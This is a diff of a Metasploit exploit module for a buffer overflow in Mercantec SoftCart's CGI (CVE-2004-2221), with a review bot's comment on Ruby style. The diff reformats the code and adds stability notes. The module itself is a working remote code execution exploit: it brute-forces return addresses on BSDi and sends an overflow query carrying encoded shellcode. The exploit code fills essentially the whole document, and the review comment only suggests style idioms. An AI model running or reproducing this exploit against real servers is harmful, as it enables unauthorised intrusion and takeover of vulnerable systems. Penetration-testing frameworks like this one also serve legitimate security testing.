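--- a/PATH_NOT_IN_SOURCE
+++ b/PATH_NOT_IN_SOURCE
@@ -10,76 +10,83 @@ class MetasploitModule < Msf::Exploit::Remote
 include Msf ::Exploit ::Remote ::HttpClient
 
 def initialize ( info = { } )
-super ( update_info ( info ,
-'Name' => 'Mercantec SoftCart CGI Overflow' ,
-'Description' => %q{
-This is an exploit for an undisclosed buffer overflow
-in the SoftCart.exe CGI as shipped with Mercantec's shopping
-cart software. It is possible to execute arbitrary code
-by passing a malformed CGI parameter in an HTTP GET
-request. This issue is known to affect SoftCart version
-4.00b.
-} ,
-'Author' => [ 'skape' , 'trew' ] ,
-'References' =>
-[
+super (
+update_info (
+info ,
+'Name' => 'Mercantec SoftCart CGI Overflow' ,
+'Description' => %q{
+This is an exploit for an undisclosed buffer overflow
+in the SoftCart.exe CGI as shipped with Mercantec's shopping
+cart software. It is possible to execute arbitrary code
+by passing a malformed CGI parameter in an HTTP GET
+request. This issue is known to affect SoftCart version
+4.00b.
+} ,
+'Author' => [ 'skape' , 'trew' ] ,
+'References' => [
 [ 'CVE' , '2004-2221' ] ,
 [ 'OSVDB' , '9011' ] ,
 [ 'BID' , '10926' ] ,
 ] ,
-'Privileged' => false ,
-'Payload' =>
-{
-'Space' => 1000 ,
+'Privileged' => false ,
+'Payload' => {
+'Space' => 1000 ,
 'BadChars' => "\x09 \x0a \x0b \x0c \x0d \x20 \x27 \x5c \x3c \x3e \x3b \x22 \x60 \x7e \x24 \x5e \x2a \x26 \x7c \x7b \x7d \x28 \x29 \x3f \x5d \x5b \x00 " ,
-'MinNops' => 16 ,
-'Prepend' => "\x6a \x02 \x58 \x50 \x9a \x00 \x00 \x00 \x00 \x07 \x00 \x85 \xd2 \x75 \x0a \x31 \xc0 \x40 \x9a \x00 \x00 \x00 \x00 \x07 \x00 " ,
-'PrependEncoder' => "\x83 \xec \x7f " ,
+'MinNops' => 16 ,
+'Prepend' => "\x6a \x02 \x58 \x50 \x9a \x00 \x00 \x00 \x00 \x07 \x00 \x85 \xd2 \x75 \x0a \x31 \xc0 \x40 \x9a \x00 \x00 \x00 \x00 \x07 \x00 " ,
+'PrependEncoder' => "\x83 \xec \x7f "
 } ,
-'Platform' => 'bsdi' ,
-'Targets' =>
-[
+'Platform' => 'bsdi' ,
+'Targets' => [
 [
 'BSDi/4.3 Bruteforce' ,
 {
 'Bruteforce' =>
 {
 'Start' => { 'Ret' => 0xefbf3000 } ,
-'Stop' => { 'Ret' => 0xefbffffc } ,
-'Step' => 0
+'Stop' => { 'Ret' => 0xefbffffc } ,
+'Step' => 0
 }
 } ,
 ] ,
 ] ,
-'DisclosureDate' => '2004-08-19' ,
-'DefaultTarget' => 0 ) )
+'DisclosureDate' => '2004-08-19' ,
+'DefaultTarget' => 0 ,
+'Notes' => {
+'Stability' => [ CRASH_SERVICE_RESTARTS ] ,
+'Reliability' => [ REPEATABLE_SESSION ] ,
+'SideEffects' => [ IOC_IN_LOGS ]
+}
+)
+)
 
 register_options (
 [
-OptString . new ( 'URI' , [ false , "The target CGI URI" , '/cgi-bin/SoftCart.exe' ] )
-] )
+OptString . new ( 'URI' , [ false , 'The target CGI URI' , '/cgi-bin/SoftCart.exe' ] )
+]
+)
 end
 
 def brute_exploit ( address )
-if not ( @mercantec )
+if ! @mercantec
 res = send_request_raw ( {
-'uri' => normalize_uri ( datastore [ 'URI' ] )
+'uri' => normalize_uri ( datastore [ 'URI' ] )
 } , 5 )
-@mercantec = ( res and res . body and res . body =~ /Copyright.*Mercantec/ )
-fail_with ( Failure ::NotFound , " The target is not a Mercantec CGI" ) if not @mercantec
+@mercantec = res && res . body && res . body =~ /Copyright.*Mercantec/
+fail_with ( Failure ::NotFound , ' The target is not a Mercantec CGI' ) if ! @mercantec
 end
 
 buffer =
-" MAA+scstoreB" +
+' MAA+scstoreB' +
 rand_text_alphanumeric ( 512 ) +
 [ address [ 'Ret' ] ] . pack ( 'V' ) +
-" MSF!" +
+' MSF!' +
 [ address [ 'Ret' ] + payload . encoded . length ] . pack ( 'V' ) +
 payload . encoded
 
-print_status ( "Trying #{ " %.8x" % address [ 'Ret' ] } ..." )
-res = send_request_raw ( {
-'uri' => normalize_uri ( datastore [ 'URI' ] ) ,
+print_status ( "Trying #{ ' %.8x' % address [ 'Ret' ] } ..." )
+send_request_raw ( {
+'uri' => normalize_uri ( datastore [ 'URI' ] ) ,
 'query' => buffer
 } , 5 )
 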
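Review bot: The `@mercantec` detection at the top of brute_exploit still uses `=~` although no MatchData is ever read, and the two new `if ! @mercantec` guards are the idiomatic `unless`; `@mercantec = res&.body&.match?(/Copyright.*Mercantec/)` together with `unless @mercantec` on both guards performs the same truthiness check without the explicit nil chain. As far as the hunk shows `@mercantec` is only ever tested for truthiness, so the memoised value changing from a match offset to a boolean should not matter, but confirm that in the rest of the method. brute_exploit also carries no doc comment; a one-liner such as `# Sends one probe built around the candidate return address address['Ret']; invoked once per bruteforce step` would orient a reader. The body of brute_exploit continues past the end of the hunk.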